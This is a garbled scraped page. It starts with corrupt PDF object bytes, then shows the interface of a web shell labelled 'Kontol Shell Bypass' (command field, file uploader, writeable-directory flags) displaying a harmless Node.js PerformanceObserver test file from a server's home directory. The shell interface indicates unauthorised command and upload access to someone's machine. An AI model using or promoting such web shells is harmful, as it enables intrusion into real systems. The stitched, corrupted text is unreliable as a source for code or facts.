%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /home/ubuntu/node-v16.18.1/test/fixtures/wpt/performance-timeline/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //home/ubuntu/node-v16.18.1/test/fixtures/wpt/performance-timeline/po-resource.html
<!DOCTYPE HTML>
<meta charset=utf-8>
<title>PerformanceObservers: resource</title>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<script src="performanceobservers.js"></script>
<h1>PerformanceObservers: resource</h1>
<p>
New resources will <a href="https://w3c.github.io/performance-timeline/#dfn-queue-a-performanceentry">queue a PerformanceEntry</a>.
</p>
<div id="log"></div>
<script>
  async_test(function (t) {
    function path(pathname) {
      var filename = pathname.substring(pathname.lastIndexOf('/')+1);
      return pathname.substring(0, pathname.length - filename.length);
    }
    var gUniqueCounter = 0;
    function generateUniqueValues() {
      return Date.now() + "-" + (++gUniqueCounter);
    }
    var stored_entries = [];
    var img_location = document.location.origin + path(document.location.pathname)
       + "resources/square.png?random=";
    var img1 = img_location + generateUniqueValues();
    var img2 = img_location + generateUniqueValues();
    var observer = new PerformanceObserver(
        t.step_func(function (entryList, obs) {
          stored_entries =
            stored_entries.concat(entryList.getEntriesByType("resource"));
          if (stored_entries.length >= 2) {
            checkEntries(stored_entries,
              [{ entryType: "resource", name: img1},
               { entryType: "resource", name: img2}]);
            observer.disconnect();
            t.done();
          }
        })
      );
    observer.observe({entryTypes: ["resource"]});
    var img = document.createElement("img");
    img.src = img1;
    document.body.appendChild(img);
    img = document.createElement("img");
    img.src = img2;
    document.body.appendChild(img);
  }, "resource entries are observable");
</script>

Kontol Shell Bypass